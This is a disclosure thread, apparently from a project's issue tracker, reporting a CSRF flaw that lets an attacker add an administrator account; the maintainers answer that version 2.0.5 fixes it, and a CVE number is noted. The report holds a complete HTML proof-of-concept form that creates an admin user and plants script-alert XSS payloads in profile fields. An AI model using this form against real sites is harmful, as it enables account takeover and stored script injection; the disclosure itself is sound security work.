There is a CSRF vulnerability that can add the administrator account

[hkzj]

After the administrator logged in, open the following page poc： csrf.html---add a admin

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.98.59/user/add" method="POST">
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="email" value="test&#64;qq&#46;com" />
      <input type="hidden" name="password" value="admin123" />
      <input type="hidden" name="verify&#95;pass" value="admin123" />
      <input type="hidden" name="type" value="admin" />
      <input type="hidden" name="company" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="title" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="website" value="" />
      <input type="hidden" name="photo" value="" />
      <input type="hidden" name="about" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="fax" value="" />
      <input type="hidden" name="address" value="" />
      <input type="hidden" name="address2" value="" />
      <input type="hidden" name="city" value="" />
      <input type="hidden" name="state" value="" />
      <input type="hidden" name="country" value="" />
      <input type="hidden" name="zip" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

[lux]

Hi, thanks for reporting this! I just pushed a commit that fixes this here, but I haven't pushed an update out yet because I want to go through to make sure there aren't others first.

[jbroadway]

Just pushed update 2.0.5 that fixes this. Thanks again for reporting it!

[fgeek]

CVE-2018-16387 has been assigned for this issue.